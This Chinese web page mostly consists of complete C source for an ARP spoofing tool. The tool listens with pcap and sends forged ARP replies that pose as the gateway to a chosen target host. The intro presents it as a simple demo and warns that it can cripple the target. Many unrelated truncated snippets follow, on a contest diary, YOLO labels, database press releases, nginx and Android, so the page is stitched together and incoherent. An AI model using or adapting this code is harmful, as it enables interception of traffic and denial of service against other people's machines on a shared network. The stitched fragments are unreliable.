arp攻擊,arp病毒曾經瘋狂的流行了一陣子。 下面是簡單的arp攻擊原來的實現例子,只是一個示例,離真正的arp攻擊還有一點距離,現在的arp攻擊越來越隱蔽越來越高科技了。
(儘量少用,很容易使攻擊的主機癱瘓)
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <netdb.h> #include <errno.h> #include <arpa/inet.h> #include <sys/ioctl.h> #include <pthread.h> #include <pcap.h> #include <net/ethernet.h> #include <netinet/ether.h> #include <net/if.h> #include <netinet/ip.h> int sockfd; struct sockaddr_ll peer_addr; unsigned char my_ip[4] = {192, 168, 1,100}; //my ip address unsigned char gateway_ip[4] = {192, 168, 1, 1}; //gateway ip address unsigned char attack_ip[4] = {192, 168, 1, 8}; //ip address to be attacked unsigned char my_mac[6] = {0x00,0x24,0x01,0x04,0x59,0x65 }; //my mac address //封裝arp包 struct arp_packet { struct ether_header eh; struct ether_arp arp; }; //封裝ip包 struct ip_packet{ struct ether_header eh; struct iphdr ip; }; void send_arp(const unsigned char* attack_ip); void process_arppachet(struct arp_packet *packet); void echo_head(char *); void echo(char *); void echo_end(char *); /** * 發送arp包到攻擊主機 */ void send_arp(const unsigned char* attack_ip) { unsigned char broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};//發送廣播包爲了獲取網關地址 //開始構造arp楨 struct arp_packet frame; memcpy(frame.eh.ether_dhost, broad_mac, 6); memcpy(frame.eh.ether_shost, my_mac, 6); frame.eh.ether_type = htons(ETH_P_ARP); frame.arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER); frame.arp.ea_hdr.ar_pro = htons(ETH_P_IP); frame.arp.ea_hdr.ar_hln = 6; frame.arp.ea_hdr.ar_pln = 4; frame.arp.ea_hdr.ar_op = htons(ARPOP_REQUEST); memcpy(frame.arp.arp_sha, my_mac, 6); memcpy(frame.arp.arp_spa, my_ip, 4); memcpy(frame.arp.arp_tha, broad_mac, 6); memcpy(frame.arp.arp_tpa, attack_ip, 4); sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr)); printf("success send arp request to 192.168.1.%d/n", attack_ip[3]); } /** * 分析arp包 */ void process_arppacket(struct arp_packet *packet) { echo_head("process_arppacket"); struct arp_packet *old_frame = packet; struct arp_packet frame; memcpy(&frame, packet, sizeof(frame)); int ar_op = ntohs(frame.arp.ea_hdr.ar_op); // ------------------------------------arp frame info------------------------------------------------------- if (ar_op == ARPOP_REQUEST) printf("arp request/t"); if (ar_op == ARPOP_RREPLY) printf("arp reply /t"); char ip_buf[128]; inet_ntop(AF_INET, &old_frame->arp.arp_spa, ip_buf, sizeof(ip_buf)); printf("[%s](%s)", ether_ntoa((struct ether_addr *) &old_frame->arp.arp_sha), ip_buf); printf("/t->/t"); memset(ip_buf, 0, sizeof(ip_buf)); inet_ntop(AF_INET, &old_frame->arp.arp_tpa, ip_buf, sizeof(ip_buf)); printf("[%s](%s)", ether_ntoa((struct ether_addr *) &old_frame->arp.arp_tha), ip_buf); printf("/n"); // --------------------------------------------------------------------------------------------- if(ar_op == ARPOP_REPLY && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == my_ip[3]) { //normal arp reply from attack_ip //bulid faked arp reply frame memcpy(frame.eh.ether_dhost, old_frame->arp.arp_sha, 6); memcpy(frame.eh.ether_shost, my_mac, 6); frame.eh.ether_type = htons(ARPOP_REPLY); memcpy(frame.arp.arp_tha, old_frame->arp.arp_sha, 6); memcpy(frame.arp.arp_tpa, attack_ip, 4); memcpy(frame.arp.arp_sha, my_mac, 6); memcpy(frame.arp.arp_spa, gateway_ip, 4); //send faked arp reply frame sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr)); printf("success faked 192.168.1.%d /n", (old_frame->arp.arp_spa)[3]); } if(((ar_op == ARPOP_REQUEST) && (old_frame->arp.arp_spa)[3] == gateway_ip[3]) || (ar_op == ARPOP_REQUEST && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == gateway_ip[3])) { //case 2 a sleep(1); send_arp(attack_ip); } } void process_ippacket(struct iphdr *ip){ echo_head("process_ippacket"); struct in_addr addr; addr.s_addr = ip->saddr; printf("%s---->",inet_ntoa(addr)); addr.s_addr = ip->daddr; printf("%s/n",inet_ntoa(addr)); int protocol = ip->protocol; switch(protocol){ case IPPROTO_TCP: printf("tcp/n"); break; case IPPROTO_UDP: printf("udp"); break; case IPPROTO_SCTP: break; default: printf("the protocol is:%d/n",protocol); break; } echo_end("process_ippacket"); } //pcap 回掉函數,用於監聽網絡上的數據包 void callback(unsigned char *args, const struct pcap_pkthdr *head, const unsigned char *packet) { struct ether_header *eh = (struct ether_header *) packet; switch (ntohs(eh->ether_type)) { case ETHERTYPE_ARP: if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) { process_arppacket((struct arp_packet *) packet); } break; case ETHERTYPE_IP: if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) { process_ippacket((struct iphdr *)(packet+sizeof(struct ether_header))); } break; default: printf("ether type is:%x/n",eh->ether_type); break; } } //通過pcap監聽網絡情況 void *arp_listen(void *arg) { char errbuf[1024]; char *dev= "wlan0"; pcap_t *handle = pcap_open_live(dev, 2048, 1, 1000, errbuf); if(handle == NULL)printf("pcap_open_live():%s/n", errbuf); unsigned int net,mask; if(pcap_lookupnet(dev, &net, &mask, errbuf) == -1)printf("pcap_lookupnet():%s/n", errbuf); struct bpf_program fp; if(pcap_compile(handle, &fp, "arp or ip", 0, net) == -1)printf("pcap_compile():%s/n", errbuf); if(pcap_setfilter(handle, &fp) == -1)printf("pcap_setfilter():%s/n", errbuf); while(pcap_loop(handle, -1, callback, NULL) != -1); return NULL; } int main(int argc, char **argv) { pthread_t tid; pthread_create(&tid, NULL, arp_listen, NULL); sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)); if(sockfd == -1)perror("socket()"); memset(&peer_addr, 0, sizeof(peer_addr)); peer_addr.sll_family = AF_PACKET; struct ifreq req; strcpy(req.ifr_name, "wlan0"); if(ioctl(sockfd, SIOCGIFINDEX, &req) != 0)perror("ioctl()"); peer_addr.sll_ifindex = req.ifr_ifindex; peer_addr.sll_protocol = htons(ETH_P_ARP); send_arp(attack_ip);//給攻擊ip發送僞造的arp包 pthread_exit(NULL);//退出主線程 return 0; } void echo_head(char *str){ if(str==NULL){ return; } printf("------------------------------------------------BEGIN %s------------------------------------------------/n",str); } void echo(char *str){ if(str==NULL){ return; } printf("%s/n",str); } void echo_end(char *str){ if(str==NULL){ return; } printf("------------------------------------------------END %s------------------------------------------------/n",str); }
Before 本文是 \(2024\) 中國大學生程序設計競賽全國邀請賽(長春)暨第 \(17\) 屆吉林省大學生設計競賽和新建比賽的遊記 寫的很爛 寫的很爛 寫的很爛 Day0 省賽報到及熱身賽。 \(14:00\) 前報到。 \(12:
一、前言 在使用yolo做人工智能運算後,運算結果除了一個方框,還可能需要增加文字顯示在對應方框上,以便標記是何種物體,比如顯示是人還是動物,或者還有可能追蹤人員,顯示該人員的姓名。這種應用場景非常普遍,而且非常有必要,可以非常直觀的直接看
一、如何對一列數據進行相同操作,比如全都添加雙引號 https://www.jiachong.com/wps/340708.html 1.首先打開表格,按Ctrl+C複製第一個單元格內容, 2.然後把複製的單元格內容按Ctrl+V粘貼到與其
恆生電子LightDB順利通過了金融信創生態實驗室的產品測試,本次測試基於典型金融業務場景並在國產硬件環境中進行,經過測試,LightDB在產品性能、功能性、兼容性以及可靠性等多個維度100%符合金融業務系統,表現優異。 在本
8月1日,強制性國家標準GB 18030-2022《信息技術 中文編碼字符集》實施。10月09日,恆生電子LightDB正式通過中國電子技術標準化研究院強制性國家標準GB18030-2022《信息技術 中文編碼字符集》最高級(實現級別
1.描述一下服務器配置: 一臺2c4g的centos,做api接口反代 一臺8c16g的windows 2019 作爲實際服務器,跑了iis,sql server,mongodb,redis 2.業務描述 2.0 服務器分爲兩個站
現象:nginx域名配置合併之後,發現consul-template無法完成nginx重載,然後發現需要重啓nginx,才能讓配置生效。 注意:下次哪個服務有報錯,就看重啓時所有日誌輸出,各種情況日誌輸出。不要忽略細節。很多時候其實已經
sudo docker run -it -d --name minio_latest -p 9000:9000 -p 9001:9001 -v /minio/data:/data -e MINIO_ROOT_USER="賬號" -e MIN
Quotations in HTML allow you to include and format quoted text within your web content. HTML provides tags such as <bl
HTML Comments are used to comment in HTML codes, so the developer can understand the purpose of that code section and it
從 Ubuntu 存儲庫安裝預構建的 Ubuntu 包 更新 Ubuntu 存儲庫信息: sudo apt-get update 安裝包: sudo apt-get install nginx 驗證安裝: sudo ngin
前臺服務變化 前臺服務一直是比較損耗電池壽命的操作,在 Android 15 Beta 2 裏,**dataSync 和 mediaProcessing 的前臺服務類型現在有大約 6 小時的超時時間**,之後系統將調用 Android 15
管理學大師彼得·德魯克說“終身學習是現在社會的生存法則”,而現實中,很少有人能清醒地意識到這一點,人們總是習慣在舒適區兜圈,重複做已經掌握的事情,對真正需要突破的職業困境視而不見。 偶爾看到同事跳槽漲薪,技術越來越嫺熟,自己也期望着可以跟他
本文介紹的主流一體化協同辦公平臺有:Worktile、PingCode、Microsoft Teams、釘釘、Google Workspace、Jive、Avaya、Bitrix24、Asana、ClickUp、飛書。 在現代工作環
近期,著名的.NET開源社區Mono正式支持LoongArch(龍架構),目前LoongArch64架構已出現在.NET社區主幹分支上。詳細內容可以跟蹤 https://github.com/mono/mono/issues/21381,